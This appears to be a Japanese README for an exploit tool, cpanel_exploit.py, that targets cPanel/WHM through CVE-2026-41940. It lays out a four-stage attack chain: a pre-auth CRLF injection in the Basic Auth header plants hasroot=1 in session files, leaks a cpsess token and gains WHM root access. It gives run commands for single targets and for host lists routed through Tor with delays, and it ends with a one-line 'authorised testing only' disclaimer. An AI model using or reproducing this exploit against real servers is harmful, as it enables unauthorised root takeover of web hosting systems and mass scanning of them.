
cPanel/WHM CVE-2026-41940 CRLFインジェクション認証バイパスエクスプロイト
cPanel/WHM セキュリティテストツールキット。CVE-2026-41940 CRLFインジェクションによる認証バイパスと、権限昇格後の特権ピボットを実装しています。
| スクリプト | 目的 |
|---|---|
cpanel_exploit.py | CVE-2026-41940: CRLFインジェクション → WHM認証バイパス → rootアクセス |
タイプ: CRLFインジェクション → 認証バイパス → root RCE
影響を受けるバージョン: パッチ適用前のcPanel/WHM
攻撃手法: Basic Authヘッダーへの事前認証CRLFインジェクションにより、サーバー側セッションファイルにhasroot=1を注入し、未認証セッションをWHM rootに昇格させます。
Stage 1: POST /login/?login_only=1 → 事前認証セッションを発行
Stage 2: GET / Authorization:Basic <CRLF> → hasroot=1を注入し、cpsessトークンを漏洩
Stage 3: GET /scripts2/listaccts → セッションキャッシュ伝播ガジェットを起動
Stage 4: GET /cpsess[TOKEN]/json-api/version → HTTP 200 + version = ROOTアクセス
pip install requests
python cpanel_exploit.py -t target.com
python cpanel_exploit.py -l whm_hosts.txt --tor --delay 2
python cpanel_exploit.py -t target.com --verify-only # CRLFチェックのみ、権限昇格なし
認可されたペネトレーションテスト専用です。